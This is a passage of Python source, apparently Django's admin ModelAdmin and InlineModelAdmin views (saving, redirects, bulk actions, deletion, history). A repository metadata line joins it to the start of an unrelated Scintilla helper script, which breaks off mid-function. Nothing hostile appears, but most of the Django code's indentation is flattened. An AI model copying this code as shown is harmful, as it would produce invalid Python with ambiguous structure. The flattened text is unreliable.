queryset = queryset.filter(reduce(operator.or_, or_queries))
if not use_distinct:
for search_spec in orm_lookups:
if lookup_needs_distinct(self.opts, search_spec):
use_distinct = True
break
return queryset, use_distinct
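    # The construct_search() prefixes above translate to ORM lookups; a
    # hedged example with hypothetical field names:
    #
    #     search_fields = ('=id', '^name', '@body', 'description')
    #     # '=id'         -> id__iexact
    #     # '^name'       -> name__istartswith
    #     # '@body'       -> body__search (full-text)
    #     # 'description' -> description__icontains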
def get_preserved_filters(self, request):
"""
Returns the preserved filters querystring.
"""
match = request.resolver_match
if self.preserve_filters and match:
opts = self.model._meta
current_url = '%s:%s' % (match.app_name, match.url_name)
changelist_url = 'admin:%s_%s_changelist' % (opts.app_label, opts.model_name)
if current_url == changelist_url:
preserved_filters = request.GET.urlencode()
else:
preserved_filters = request.GET.get('_changelist_filters')
if preserved_filters:
return urlencode({'_changelist_filters': preserved_filters})
return ''
def construct_change_message(self, request, form, formsets, add=False):
"""
Construct a change message from a changed object.
"""
change_message = []
if add:
change_message.append(_('Added.'))
elif form.changed_data:
change_message.append(_('Changed %s.') % get_text_list(form.changed_data, _('and')))
if formsets:
for formset in formsets:
for added_object in formset.new_objects:
change_message.append(_('Added %(name)s "%(object)s".')
% {'name': force_text(added_object._meta.verbose_name),
'object': force_text(added_object)})
for changed_object, changed_fields in formset.changed_objects:
change_message.append(_('Changed %(list)s for %(name)s "%(object)s".')
% {'list': get_text_list(changed_fields, _('and')),
'name': force_text(changed_object._meta.verbose_name),
'object': force_text(changed_object)})
for deleted_object in formset.deleted_objects:
change_message.append(_('Deleted %(name)s "%(object)s".')
% {'name': force_text(deleted_object._meta.verbose_name),
'object': force_text(deleted_object)})
change_message = ' '.join(change_message)
return change_message or _('No fields changed.')
def message_user(self, request, message, level=messages.INFO, extra_tags='',
fail_silently=False):
"""
Send a message to the user. The default implementation
posts a message using the django.contrib.messages backend.
Exposes almost the same API as messages.add_message(), but accepts the
positional arguments in a different order to maintain backwards
compatibility. For convenience, it accepts the `level` argument as
a string rather than the usual level number.
"""
if not isinstance(level, int):
# attempt to get the level if passed a string
try:
level = getattr(messages.constants, level.upper())
except AttributeError:
levels = messages.constants.DEFAULT_TAGS.values()
levels_repr = ', '.join('`%s`' % l for l in levels)
raise ValueError('Bad message level string: `%s`. '
'Possible values are: %s' % (level, levels_repr))
messages.add_message(request, level, message, extra_tags=extra_tags,
fail_silently=fail_silently)
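    # Usage sketch: the level may be passed numerically or as the name of a
    # messages constant, so the two calls below are equivalent:
    #
    #     self.message_user(request, "Saved.", messages.SUCCESS)
    #     self.message_user(request, "Saved.", 'success')
    #
    # An unknown level string raises ValueError, as implemented above.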
def save_form(self, request, form, change):
"""
Given a ModelForm return an unsaved instance. ``change`` is True if
the object is being changed, and False if it's being added.
"""
return form.save(commit=False)
def save_model(self, request, obj, form, change):
"""
Given a model instance save it to the database.
"""
obj.save()
def delete_model(self, request, obj):
"""
Given a model instance delete it from the database.
"""
obj.delete()
def save_formset(self, request, form, formset, change):
"""
Given an inline formset save it to the database.
"""
formset.save()
def save_related(self, request, form, formsets, change):
"""
Given the ``HttpRequest``, the parent ``ModelForm`` instance, the
list of inline formsets and a boolean value based on whether the
parent is being added or changed, save the related objects to the
database. Note that at this point save_form() and save_model() have
already been called.
"""
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=change)
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
opts = self.model._meta
app_label = opts.app_label
preserved_filters = self.get_preserved_filters(request)
form_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, form_url)
view_on_site_url = self.get_view_on_site_url(obj)
context.update({
'add': add,
'change': change,
'has_add_permission': self.has_add_permission(request),
'has_change_permission': self.has_change_permission(request, obj),
'has_delete_permission': self.has_delete_permission(request, obj),
            'has_file_field': True,  # FIXME - this should check if form or formsets have a FileField
'has_absolute_url': view_on_site_url is not None,
'absolute_url': view_on_site_url,
'form_url': form_url,
'opts': opts,
'content_type_id': get_content_type_for_model(self.model).pk,
'save_as': self.save_as,
'save_on_top': self.save_on_top,
'to_field_var': TO_FIELD_VAR,
'is_popup_var': IS_POPUP_VAR,
'app_label': app_label,
})
if add and self.add_form_template is not None:
form_template = self.add_form_template
else:
form_template = self.change_form_template
request.current_app = self.admin_site.name
return TemplateResponse(request, form_template or [
"admin/%s/%s/change_form.html" % (app_label, opts.model_name),
"admin/%s/change_form.html" % app_label,
"admin/change_form.html"
], context)
def response_add(self, request, obj, post_url_continue=None):
"""
Determines the HttpResponse for the add_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)}
# Here, we distinguish between different save types by checking for
# the presence of keys in request.POST.
if IS_POPUP_VAR in request.POST:
to_field = request.POST.get(TO_FIELD_VAR)
if to_field:
attr = str(to_field)
else:
attr = obj._meta.pk.attname
value = obj.serializable_value(attr)
return SimpleTemplateResponse('admin/popup_response.html', {
'value': value,
'obj': obj,
})
elif "_continue" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
if post_url_continue is None:
post_url_continue = reverse('admin:%s_%s_change' %
(opts.app_label, opts.model_name),
args=(quote(pk_value),),
current_app=self.admin_site.name)
post_url_continue = add_preserved_filters(
{'preserved_filters': preserved_filters, 'opts': opts},
post_url_continue
)
return HttpResponseRedirect(post_url_continue)
elif "_addanother" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may add another %(name)s below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.path
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
else:
msg = _('The %(name)s "%(obj)s" was added successfully.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
return self.response_post_save_add(request, obj)
def response_change(self, request, obj):
"""
Determines the HttpResponse for the change_view stage.
"""
if IS_POPUP_VAR in request.POST:
to_field = request.POST.get(TO_FIELD_VAR)
attr = str(to_field) if to_field else obj._meta.pk.attname
# Retrieve the `object_id` from the resolved pattern arguments.
value = request.resolver_match.args[0]
new_value = obj.serializable_value(attr)
return SimpleTemplateResponse('admin/popup_response.html', {
'action': 'change',
'value': escape(value),
'obj': escapejs(obj),
'new_value': escape(new_value),
})
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)}
if "_continue" in request.POST:
msg = _('The %(name)s "%(obj)s" was changed successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.path
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
elif "_saveasnew" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = reverse('admin:%s_%s_change' %
(opts.app_label, opts.model_name),
args=(pk_value,),
current_app=self.admin_site.name)
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
elif "_addanother" in request.POST:
msg = _('The %(name)s "%(obj)s" was changed successfully. You may add another %(name)s below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = reverse('admin:%s_%s_add' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
else:
msg = _('The %(name)s "%(obj)s" was changed successfully.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
return self.response_post_save_change(request, obj)
def response_post_save_add(self, request, obj):
"""
Figure out where to redirect after the 'Save' button has been pressed
when adding a new object.
"""
opts = self.model._meta
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def response_post_save_change(self, request, obj):
"""
Figure out where to redirect after the 'Save' button has been pressed
when editing an existing object.
"""
opts = self.model._meta
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def response_action(self, request, queryset):
"""
Handle an admin action. This is called if a request is POSTed to the
changelist; it returns an HttpResponse if the action was handled, and
None otherwise.
"""
# There can be multiple action forms on the page (at the top
# and bottom of the change list, for example). Get the action
# whose button was pushed.
try:
action_index = int(request.POST.get('index', 0))
except ValueError:
action_index = 0
# Construct the action form.
data = request.POST.copy()
data.pop(helpers.ACTION_CHECKBOX_NAME, None)
data.pop("index", None)
# Use the action whose button was pushed
try:
data.update({'action': data.getlist('action')[action_index]})
except IndexError:
            # If we didn't get an action from the chosen form, the POST data
            # is invalid; with 'action' missing the form fails the validation
            # check below, so nothing else needs to happen here.
pass
action_form = self.action_form(data, auto_id=None)
action_form.fields['action'].choices = self.get_action_choices(request)
# If the form's valid we can handle the action.
if action_form.is_valid():
action = action_form.cleaned_data['action']
select_across = action_form.cleaned_data['select_across']
func = self.get_actions(request)[action][0]
            # Get the list of selected PKs. If nothing is selected, we can't
            # perform an action on it, so bail -- unless the user asked to run
            # the action across all objects (select_across).
selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)
if not selected and not select_across:
# Reminder that something needs to be selected or nothing will happen
msg = _("Items must be selected in order to perform "
"actions on them. No items have been changed.")
self.message_user(request, msg, messages.WARNING)
return None
if not select_across:
# Perform the action only on the selected objects
queryset = queryset.filter(pk__in=selected)
response = func(self, request, queryset)
# Actions may return an HttpResponse-like object, which will be
# used as the response from the POST. If not, we'll be a good
# little HTTP citizen and redirect back to the changelist page.
if isinstance(response, HttpResponseBase):
return response
else:
return HttpResponseRedirect(request.get_full_path())
else:
msg = _("No action selected.")
self.message_user(request, msg, messages.WARNING)
return None
def response_delete(self, request, obj_display, obj_id):
"""
Determines the HttpResponse for the delete_view stage.
"""
opts = self.model._meta
if IS_POPUP_VAR in request.POST:
return SimpleTemplateResponse('admin/popup_response.html', {
'action': 'delete',
'value': escape(obj_id),
})
self.message_user(request,
_('The %(name)s "%(obj)s" was deleted successfully.') % {
'name': force_text(opts.verbose_name),
'obj': force_text(obj_display),
}, messages.SUCCESS)
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters(
{'preserved_filters': preserved_filters, 'opts': opts}, post_url
)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def render_delete_form(self, request, context):
opts = self.model._meta
app_label = opts.app_label
request.current_app = self.admin_site.name
context.update(
to_field_var=TO_FIELD_VAR,
is_popup_var=IS_POPUP_VAR,
)
return TemplateResponse(request,
self.delete_confirmation_template or [
"admin/{}/{}/delete_confirmation.html".format(app_label, opts.model_name),
"admin/{}/delete_confirmation.html".format(app_label),
"admin/delete_confirmation.html"
], context)
def get_inline_formsets(self, request, formsets, inline_instances,
obj=None):
inline_admin_formsets = []
for inline, formset in zip(inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request, obj))
readonly = list(inline.get_readonly_fields(request, obj))
prepopulated = dict(inline.get_prepopulated_fields(request, obj))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,
fieldsets, prepopulated, readonly, model_admin=self)
inline_admin_formsets.append(inline_admin_formset)
return inline_admin_formsets
def get_changeform_initial_data(self, request):
"""
Get the initial form data.
Unless overridden, this populates from the GET params.
"""
initial = dict(request.GET.items())
for k in initial:
try:
f = self.model._meta.get_field(k)
except FieldDoesNotExist:
continue
# We have to special-case M2Ms as a list of comma-separated PKs.
if isinstance(f, models.ManyToManyField):
initial[k] = initial[k].split(",")
return initial
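    # Example with an illustrative URL: /admin/app/article/add/?title=Draft&tags=1,2
    # yields initial data {'title': 'Draft', 'tags': ['1', '2']} when ``tags``
    # is a ManyToManyField, via the comma-split special case above.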
@csrf_protect_m
@transaction.atomic
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
model = self.model
opts = model._meta
add = object_id is None
if add:
if not self.has_add_permission(request):
raise PermissionDenied
obj = None
else:
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(opts.verbose_name), 'key': escape(object_id)})
if request.method == 'POST' and "_saveasnew" in request.POST:
object_id = None
obj = None
ModelForm = self.get_form(request, obj)
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=not add)
else:
form_validated = False
new_object = form.instance
formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, not add)
self.save_related(request, form, formsets, not add)
change_message = self.construct_change_message(request, form, formsets, add)
if add:
self.log_addition(request, new_object, change_message)
return self.response_add(request, new_object)
else:
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form_validated = False
else:
if add:
initial = self.get_changeform_initial_data(request)
form = ModelForm(initial=initial)
formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
else:
form = ModelForm(instance=obj)
formsets, inline_instances = self._create_formsets(request, obj, change=True)
adminForm = helpers.AdminForm(
form,
list(self.get_fieldsets(request, obj)),
self.get_prepopulated_fields(request, obj),
self.get_readonly_fields(request, obj),
model_admin=self)
media = self.media + adminForm.media
inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
for inline_formset in inline_formsets:
media = media + inline_formset.media
context = dict(self.admin_site.each_context(request),
title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
adminform=adminForm,
object_id=object_id,
original=obj,
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
media=media,
inline_admin_formsets=inline_formsets,
errors=helpers.AdminErrorList(form, formsets),
preserved_filters=self.get_preserved_filters(request),
)
# Hide the "Save" and "Save and continue" buttons if "Save as New" was
# previously chosen to prevent the interface from getting confusing.
if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
context['show_save'] = False
context['show_save_and_continue'] = False
context.update(extra_context or {})
return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)
def add_view(self, request, form_url='', extra_context=None):
return self.changeform_view(request, None, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
return self.changeform_view(request, object_id, form_url, extra_context)
@csrf_protect_m
def changelist_view(self, request, extra_context=None):
"""
The 'change list' admin view for this model.
"""
from django.contrib.admin.views.main import ERROR_FLAG
opts = self.model._meta
app_label = opts.app_label
if not self.has_change_permission(request, None):
raise PermissionDenied
list_display = self.get_list_display(request)
list_display_links = self.get_list_display_links(request, list_display)
list_filter = self.get_list_filter(request)
search_fields = self.get_search_fields(request)
list_select_related = self.get_list_select_related(request)
# Check actions to see if any are available on this changelist
actions = self.get_actions(request)
if actions:
# Add the action checkboxes if there are any actions available.
list_display = ['action_checkbox'] + list(list_display)
ChangeList = self.get_changelist(request)
try:
cl = ChangeList(request, self.model, list_display,
list_display_links, list_filter, self.date_hierarchy,
search_fields, list_select_related, self.list_per_page,
self.list_max_show_all, self.list_editable, self)
except IncorrectLookupParameters:
# Wacky lookup parameters were given, so redirect to the main
# changelist page, without parameters, and pass an 'invalid=1'
# parameter via the query string. If wacky parameters were given
# and the 'invalid=1' parameter was already in the query string,
# something is screwed up with the database, so display an error
# page.
if ERROR_FLAG in request.GET.keys():
return SimpleTemplateResponse('admin/invalid_setup.html', {
'title': _('Database error'),
})
return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
# If the request was POSTed, this might be a bulk action or a bulk
# edit. Try to look up an action or confirmation first, but if this
# isn't an action the POST will fall through to the bulk edit check,
# below.
action_failed = False
selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)
# Actions with no confirmation
if (actions and request.method == 'POST' and
'index' in request.POST and '_save' not in request.POST):
if selected:
response = self.response_action(request, queryset=cl.get_queryset(request))
if response:
return response
else:
action_failed = True
else:
msg = _("Items must be selected in order to perform "
"actions on them. No items have been changed.")
self.message_user(request, msg, messages.WARNING)
action_failed = True
# Actions with confirmation
if (actions and request.method == 'POST' and
helpers.ACTION_CHECKBOX_NAME in request.POST and
'index' not in request.POST and '_save' not in request.POST):
if selected:
response = self.response_action(request, queryset=cl.get_queryset(request))
if response:
return response
else:
action_failed = True
# If we're allowing changelist editing, we need to construct a formset
# for the changelist given all the fields to be edited. Then we'll
# use the formset to validate/process POSTed data.
formset = cl.formset = None
# Handle POSTed bulk-edit data.
if (request.method == "POST" and cl.list_editable and
'_save' in request.POST and not action_failed):
FormSet = self.get_changelist_formset(request)
formset = cl.formset = FormSet(request.POST, request.FILES, queryset=cl.result_list)
if formset.is_valid():
changecount = 0
for form in formset.forms:
if form.has_changed():
obj = self.save_form(request, form, change=True)
self.save_model(request, obj, form, change=True)
self.save_related(request, form, formsets=[], change=True)
change_msg = self.construct_change_message(request, form, None)
self.log_change(request, obj, change_msg)
changecount += 1
if changecount:
if changecount == 1:
name = force_text(opts.verbose_name)
else:
name = force_text(opts.verbose_name_plural)
msg = ungettext("%(count)s %(name)s was changed successfully.",
"%(count)s %(name)s were changed successfully.",
changecount) % {'count': changecount,
'name': name,
'obj': force_text(obj)}
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(request.get_full_path())
# Handle GET -- construct a formset for display.
elif cl.list_editable:
FormSet = self.get_changelist_formset(request)
formset = cl.formset = FormSet(queryset=cl.result_list)
# Build the list of media to be used by the formset.
if formset:
media = self.media + formset.media
else:
media = self.media
# Build the action form and populate it with available actions.
if actions:
action_form = self.action_form(auto_id=None)
action_form.fields['action'].choices = self.get_action_choices(request)
else:
action_form = None
selection_note_all = ungettext('%(total_count)s selected',
'All %(total_count)s selected', cl.result_count)
context = dict(
self.admin_site.each_context(request),
module_name=force_text(opts.verbose_name_plural),
selection_note=_('0 of %(cnt)s selected') % {'cnt': len(cl.result_list)},
selection_note_all=selection_note_all % {'total_count': cl.result_count},
title=cl.title,
is_popup=cl.is_popup,
to_field=cl.to_field,
cl=cl,
media=media,
has_add_permission=self.has_add_permission(request),
opts=cl.opts,
action_form=action_form,
actions_on_top=self.actions_on_top,
actions_on_bottom=self.actions_on_bottom,
actions_selection_counter=self.actions_selection_counter,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.change_list_template or [
'admin/%s/%s/change_list.html' % (app_label, opts.model_name),
'admin/%s/change_list.html' % app_label,
'admin/change_list.html'
], context)
@csrf_protect_m
@transaction.atomic
def delete_view(self, request, object_id, extra_context=None):
"The 'delete' admin view for this model."
opts = self.model._meta
app_label = opts.app_label
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(opts.verbose_name), 'key': escape(object_id)}
)
using = router.db_for_write(self.model)
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
(deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
[obj], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_text(obj)
attr = str(to_field) if to_field else opts.pk.attname
obj_id = obj.serializable_value(attr)
self.log_deletion(request, obj, obj_display)
self.delete_model(request, obj)
return self.response_delete(request, obj_display, obj_id)
object_name = force_text(opts.verbose_name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": object_name}
else:
title = _("Are you sure?")
context = dict(
self.admin_site.each_context(request),
title=title,
object_name=object_name,
object=obj,
deleted_objects=deleted_objects,
model_count=dict(model_count).items(),
perms_lacking=perms_needed,
protected=protected,
opts=opts,
app_label=app_label,
preserved_filters=self.get_preserved_filters(request),
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
)
context.update(extra_context or {})
return self.render_delete_form(request, context)
def history_view(self, request, object_id, extra_context=None):
"The 'history' admin view for this model."
from django.contrib.admin.models import LogEntry
# First check if the user can see this history.
model = self.model
obj = self.get_object(request, unquote(object_id))
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(model._meta.verbose_name),
'key': escape(object_id),
})
if not self.has_change_permission(request, obj):
raise PermissionDenied
# Then get the history for this object.
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id=unquote(object_id),
content_type=get_content_type_for_model(model)
).select_related().order_by('action_time')
context = dict(self.admin_site.each_context(request),
title=_('Change history: %s') % force_text(obj),
action_list=action_list,
module_name=capfirst(force_text(opts.verbose_name_plural)),
object=obj,
opts=opts,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.model_name),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context)
def _create_formsets(self, request, obj, change):
"Helper function to generate formsets for add/change_view."
formsets = []
inline_instances = []
prefixes = {}
get_formsets_args = [request]
if change:
get_formsets_args.append(obj)
for FormSet, inline in self.get_formsets_with_inlines(*get_formsets_args):
prefix = FormSet.get_default_prefix()
prefixes[prefix] = prefixes.get(prefix, 0) + 1
if prefixes[prefix] != 1 or not prefix:
prefix = "%s-%s" % (prefix, prefixes[prefix])
formset_params = {
'instance': obj,
'prefix': prefix,
'queryset': inline.get_queryset(request),
}
if request.method == 'POST':
formset_params.update({
'data': request.POST,
'files': request.FILES,
'save_as_new': '_saveasnew' in request.POST
})
formsets.append(FormSet(**formset_params))
inline_instances.append(inline)
return formsets, inline_instances
class InlineModelAdmin(BaseModelAdmin):
"""
Options for inline editing of ``model`` instances.
Provide ``fk_name`` to specify the attribute name of the ``ForeignKey``
from ``model`` to its parent. This is required if ``model`` has more than
one ``ForeignKey`` to its parent.
"""
model = None
fk_name = None
formset = BaseInlineFormSet
extra = 3
min_num = None
max_num = None
template = None
verbose_name = None
verbose_name_plural = None
can_delete = True
show_change_link = False
checks_class = InlineModelAdminChecks
def __init__(self, parent_model, admin_site):
self.admin_site = admin_site
self.parent_model = parent_model
self.opts = self.model._meta
self.has_registered_model = admin_site.is_registered(self.model)
super(InlineModelAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
@property
def media(self):
extra = '' if settings.DEBUG else '.min'
js = ['vendor/jquery/jquery%s.js' % extra, 'jquery.init.js',
'inlines%s.js' % extra]
if self.filter_vertical or self.filter_horizontal:
js.extend(['SelectBox.js', 'SelectFilter2.js'])
return forms.Media(js=[static('admin/js/%s' % url) for url in js])
def get_extra(self, request, obj=None, **kwargs):
"""Hook for customizing the number of extra inline forms."""
return self.extra
def get_min_num(self, request, obj=None, **kwargs):
"""Hook for customizing the min number of inline forms."""
return self.min_num
def get_max_num(self, request, obj=None, **kwargs):
"""Hook for customizing the max number of extra inline forms."""
return self.max_num
def get_formset(self, request, obj=None, **kwargs):
"""Returns a BaseInlineFormSet class for use in admin add/change views."""
if 'fields' in kwargs:
fields = kwargs.pop('fields')
else:
fields = flatten_fieldsets(self.get_fieldsets(request, obj))
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(self.get_readonly_fields(request, obj))
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# InlineModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
# If exclude is an empty list we use None, since that's the actual
# default.
exclude = exclude or None
can_delete = self.can_delete and self.has_delete_permission(request, obj)
defaults = {
"form": self.form,
"formset": self.formset,
"fk_name": self.fk_name,
"fields": fields,
"exclude": exclude,
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
"extra": self.get_extra(request, obj, **kwargs),
"min_num": self.get_min_num(request, obj, **kwargs),
"max_num": self.get_max_num(request, obj, **kwargs),
"can_delete": can_delete,
}
defaults.update(kwargs)
base_model_form = defaults['form']
class DeleteProtectedModelForm(base_model_form):
def hand_clean_DELETE(self):
"""
We don't validate the 'DELETE' field itself because on
templates it's not rendered using the field information, but
just using a generic "deletion_field" of the InlineModelAdmin.
"""
if self.cleaned_data.get(DELETION_FIELD_NAME, False):
using = router.db_for_write(self._meta.model)
collector = NestedObjects(using=using)
if self.instance.pk is None:
return
collector.collect([self.instance])
if collector.protected:
objs = []
for p in collector.protected:
objs.append(
# Translators: Model verbose name and instance representation,
# suitable to be an item in a list.
_('%(class_name)s %(instance)s') % {
'class_name': p._meta.verbose_name,
'instance': p}
)
params = {'class_name': self._meta.model._meta.verbose_name,
'instance': self.instance,
'related_objects': get_text_list(objs, _('and'))}
msg = _("Deleting %(class_name)s %(instance)s would require "
"deleting the following protected related objects: "
"%(related_objects)s")
raise ValidationError(msg, code='deleting_protected', params=params)
def is_valid(self):
result = super(DeleteProtectedModelForm, self).is_valid()
self.hand_clean_DELETE()
return result
defaults['form'] = DeleteProtectedModelForm
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = forms.ALL_FIELDS
return inlineformset_factory(self.parent_model, self.model, **defaults)
def get_fields(self, request, obj=None):
if self.fields:
return self.fields
form = self.get_formset(request, obj, fields=None).form
return list(form.base_fields) + list(self.get_readonly_fields(request, obj))
def get_queryset(self, request):
queryset = super(InlineModelAdmin, self).get_queryset(request)
if not self.has_change_permission(request):
queryset = queryset.none()
return queryset
def has_add_permission(self, request):
if self.opts.auto_created:
# We're checking the rights to an auto-created intermediate model,
# which doesn't have its own individual permissions. The user needs
# to have the change permission for the related model in order to
# be able to do anything with the intermediate model.
return self.has_change_permission(request)
return super(InlineModelAdmin, self).has_add_permission(request)
def has_change_permission(self, request, obj=None):
opts = self.opts
if opts.auto_created:
# The model was auto-created as intermediary for a
# ManyToMany-relationship, find the target model
for field in opts.fields:
if field.remote_field and field.remote_field.model != self.parent_model:
opts = field.remote_field.model._meta
break
codename = get_permission_codename('change', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_delete_permission(self, request, obj=None):
if self.opts.auto_created:
# We're checking the rights to an auto-created intermediate model,
# which doesn't have its own individual permissions. The user needs
# to have the change permission for the related model in order to
# be able to do anything with the intermediate model.
return self.has_change_permission(request, obj)
return super(InlineModelAdmin, self).has_delete_permission(request, obj)
class StackedInline(InlineModelAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularInline(InlineModelAdmin):
template = 'admin/edit_inline/tabular.html'
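# Illustrative subclassing (a sketch; "Book", "Author", and the admin import
# are assumptions, not part of this module):
#
#     from django.contrib import admin
#
#     class BookInline(admin.TabularInline):
#         model = Book
#         fk_name = 'author'  # only needed if Book has several FKs to Author
#         extra = 1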
| bsd-3-clause |
ppriest/mame | 3rdparty/bgfx/3rdparty/scintilla/scripts/ScintillaData.py | 69 | 8599 | # ScintillaData.py - implemented 2013 by Neil Hodgson [email protected]
# Released to the public domain.
# Common code used by Scintilla and SciTE for source file regeneration.
# The ScintillaData object exposes information about Scintilla as properties:
# Version properties
# version
# versionDotted
# versionCommad
#
# Date last modified
# dateModified
# yearModified
# mdyModified
# dmyModified
# myModified
#
# Information about lexers and properties defined in lexers
# lexFiles
# sorted list of lexer files
# lexerModules
# sorted list of module names
# lexerProperties
# sorted list of lexer properties
# propertyDocuments
# dictionary of property documentation { name: document string }
# This file can be run to see the data it provides.
# Requires Python 2.5 or later
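#
# Illustrative usage (a sketch; the relative path matches the demo at the
# bottom of this file and depends on where the script is run from):
#
#     sci = ScintillaData("../")
#     print(sci.versionDotted)   # e.g. "3.3.0"
#     print(len(sci.lexFiles))   # number of lexers/Lex*.cxx files found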
from __future__ import with_statement
import codecs, datetime, glob, os, sys, textwrap
import FileGenerator
def FindModules(lexFile):
modules = []
with open(lexFile) as f:
for l in f.readlines():
if l.startswith("LexerModule"):
l = l.replace("(", " ")
modules.append(l.split()[1])
return modules
# Properties that start with lexer. or fold. are automatically found but there are some
# older properties that don't follow this pattern so must be explicitly listed.
knownIrregularProperties = [
"fold",
"styling.within.preprocessor",
"tab.timmy.whinge.level",
"asp.default.language",
"html.tags.case.sensitive",
"ps.level",
"ps.tokenize",
"sql.backslash.escapes",
"nsis.uservars",
"nsis.ignorecase"
]
def FindProperties(lexFile):
properties = {}
with open(lexFile) as f:
for l in f.readlines():
if ("GetProperty" in l or "DefineProperty" in l) and "\"" in l:
l = l.strip()
